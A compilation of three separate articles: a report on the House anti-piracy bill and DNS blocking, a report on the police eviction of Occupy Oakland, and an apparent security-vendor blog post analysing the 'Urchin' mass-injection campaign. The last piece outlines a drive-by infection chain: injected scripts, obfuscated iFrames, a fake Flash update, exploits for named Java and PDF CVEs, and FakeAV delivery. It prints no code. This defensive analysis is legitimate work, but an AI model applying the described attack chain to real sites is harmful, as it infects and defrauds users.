Feds to Blacklist Piracy Sites Under House Proposal

A bipartisan group of House members introduced legislation Wednesday that would boost the government’s authority to disrupt and shutter websites that hawk or host trademark- and copyright-infringing products, including allowing the government to order sites removed from search engines.

Much of the package is similar to a stalled Senate measure known as the Protect IP Act. Both proposals amount to the holy grail of intellectual-property enforcement that the recording industry, movie studios and their union and guild workforces have been clamoring for since the George W. Bush administration.

Both bills allow the Justice Department for the first time to obtain court orders demanding American ISPs to stop rendering the DNS for a particular website — meaning the sites could still be accessible outside the United States. The House bill also allows the Justice Department to order search sites like Google to remove the allegedly infringing site from its search results.

Furthermore, the newest proposal, (.pdf) introduced by House Judiciary Committee Chairman Lamar Smith (R-Texas), grants the U.S. attorney general sweeping powers to block the distribution of workarounds that let users navigate to sites that have been blacklisted or had their domain name seized, such as the MafiaaFire plugin on the Firefox browser.

Sherwin Siy, a staff attorney with digital rights group Public Knowledge, said the measure could be interpreted to prevent reporters from writing about DNS workarounds, such as publishing the IP addresses of banned websites. DNS servers translate domain names, such as Wikipedia.org, into IP addresses – but DNS can be bypassed if a user knows the IP address of a site.

“If anybody tells people how they can get around that block, the attorney general can bring an action on them,” Siy said in a telephone interview.

He suggested the government could order news sites to take down stories noting workarounds. ”It’s written pretty broadly,” he added of the bill, officially known as the “Stop Online Piracy Act.”

The anti-workaround provisions of the 79-page proposal, in part, appears to be in response to a white paper from top internet security experts concerned over the fallout if the Justice Department begins ordering American internet service providers to stop giving out the correct DNS entry for an infringing website under the .com, .org and .net domains.

DNS filtering not only causes security problems, it also invites the creation of workarounds, according to the paper written by Steve Crocker of Shinkuro, David Dagon of Georgia Tech, Dan Kaminsky of DKH, Danny McPherson of Verisign and Paul Vixie of Internet Systems Consortium.

Mandated DNS filtering would be minimally effective and would present technical challenges that could frustrate important security initiatives. Additionally, it would promote development of techniques and software that circumvent use of the DNS. These actions would threaten the Domain Name System’s ability to provide universal naming, a primary source of the internet’s value as a single, unified, global communications network.

Moments after the House legislation was introduced, Smith said the bill was needed because “Rogue websites that steal and sell American innovations have operated with impunity,” Smith said in a statement.

The United States, however, has been invoking an asset-forfeiture law to seize generic top-level domains of infringing websites under a new program called “Operation in Our Sites.” It began last year, and the Department of Homeland Security has targeted more than 128 sites, ranging from sites that link to video streams to those that hawk knock-off paraphernalia.

The House bill, like the Senate bill, allows rights holders to seek court orders instructing online ad services and credit card companies from partnering with the infringing sites.

The Smith proposal is set for a hearing Nov. 16  before the House Judiciary Committee, where it is expected to pass and then move to the House floor.

The Senate’s counterpart legislation, however, has been placed on a permanent, procedural hold by Sen. Ron Wyden (D-Oregon). Wyden said the Protect IP Act represents a “threat to our economic future.”

Photo: Richard Winchell/Flickr

Police Evict OaklandOccupy With Tear Gas, Setting Up Wednesday Clash

Police violently evicted OccupyOakland, one of the more established and extensive of the occupations, on Tuesday shooting at protestors with projectile rounds and tear gas, drawing national attention.

Over the course of 24 hours, starting with an early morning raid, hundreds of police officers took back control of the square and removed tents.

Police arrested nearly 100 protestors — firing so-called less lethal rounds into the crowd, and using tear gas to attempt to disperse protestors who tried to return to the square. Protestors also accused the police of using flash bang grenades and a sound cannon. The Guardian reported that Iraq war vet Scott Olsen is in a local hospital in critical condition with a skull fracture and brain swelling.

Last night, after the bangs had died down and the tear gas blown away, about a dozen protestors remained. A line of police stood on the other side of a barrier, surrounded by piles of broken glass, unidentifiable debris, a book about Glenn Beck and even a pair of panties, all of which, being on the wrong side of the barricade, had presumably been thrown at the police.

Where I stood, rubber bullets littered the ground, and the intersection’s pavement bore marks where the teargas canisters hit.

The protestors I talked to said they had been teargassed several times.

Police forces from around the Bay Area participated in the eviction, though Oakland officials have not yet responded to a request to clarify about the exact makeup of the force. Across the barrier, I saw an officer in unfamiliar brown uniform. I tapped my arm in the same spot where the crest was on his uniform, and shouted over the barricade “Where from?” He shouted back “Marin County!,” referring to the wealthy county just north of San Francisco. I stopped walking and said “Wow!” He laughed in response, and said, “Me too!”

After the shouting died down, there was some cordial conversation between protestors and Oakland police officers — and protestors even pushed a tray of coffees under the barricades for the officers, though they politely refused.

This evening at 6 p.m., it’s all scheduled to happen again, with a rally and general assembly scheduled to meet at the plaza. Wired will be on the scene.

Photos: Top, Dean Putney/Flickr  Bottom, Quinn Norton/Wired

The True Face of Urchin

In recent days, we have seen blogs about a specific type of Mass Injection campaign. We take this opportunity to publish our findings in this blog.

This particular campaign has already picked up pace and it is infecting a lot of innocent users out there. It all starts with a script that is injected into certain sites. The script itself points to one particular site: “http://[REMOVED]/urchin.js”. Throughout this blog, we will see the different exploits that this particular campaign uses in order to install malicious files on to a compromised computer.

Upon visiting a site with the injected script, the user is redirected to a malicious site. A subsequent redirection takes the user to a site that contains an obfuscated script. When the script is decoded, it reveals an embedded iFrame tag. Below is an example of the de-obfuscated iFrame tag embedded in the site.

The page then presents a video with a play button, which, when clicked on, will display a fake message advising the user to update their Adobe Flash Player as can be seen in the image below.

Even when “Don’t Install” is clicked, the user is still prompted to install the update.

The “i.html” page also stores a multitude of exploits. As an anti de-obfuscation method, the script employs the “argument.callee” function, which is a function that we have seen employed by many malicious scripts. This can be seen in the highlighted section in the image below.

De-obfuscating this script gives us a manifold of scripts that appear to have an identical pattern to that in the above image. Each of them, when decoded separately, reveal a hidden exploit. Each script also contains a plug-in detection script that helps to identify different plug-ins installed on the compromised computer. At the time of writing, the site was attempting to exploit the following vulnerabilities:

  • CVE-2010-0842 – Java Midi Vulnerability (BID 39077)
  • CVE-2008-2992 – PDF Util.Printf Vulnerability (BID 32091)
  • CVE- 2007-5659 – PDF CollectEmailInfo Vulnerability (BID 27641)
  • CVE- 2009-0927 – PDF GetIcon Vulnerability (BID 34169)
  • CVE-2010-0840 – Java Trusted Methods Chaining Remote Code Execution Vulnerability (BID 39065)
  • CVE-2010-4452 - Java Web Start Vulnerability (BID 46388)

Below is a snapshot of a decoded version of the Java Midi exploit (CVE-2010-0842).

The malicious RMF file that is required to trigger the vulnerability is obfuscated and later passed to the JAR file at runtime as an html array. The malicious JavaScript inside the PDF was also using a similar template for obfuscating the script. De-obfuscating it reveals the exploits included within it. The highlighted section in the following image shows the different exploits.

Regardless of whether the user manually installs the malware from the fake Adobe Flash Player update screen, we can see that the malware will be installed if any of the aforementioned vulnerabilities are successfully exploited. Hence, the chances of the malware being successfully installed on the computer are significantly increased.

Ultimately when any of the vulnerabilities are exploited or the user manually clicks the “Install Now” button as seen in the below image, the FakeAV downloader will be installed.

Below is a snapshot of the FakeAV scanner that prompts the user to run the FakeAV downloader, which actually downloads the FakeAV.

Consequently, it is not only a single method that exists whereby the computer can become compromised, but rather there are several methods. This is another typical scenario that blends the installation of malware through both social engineering attacks and the installation of malware through exploiting various vulnerabilities.

Symantec‘s multi-layered approach protects its users from these types of attacks. However, we do urge users to update both their security software and their various plug-ins in order to thwart these attacks.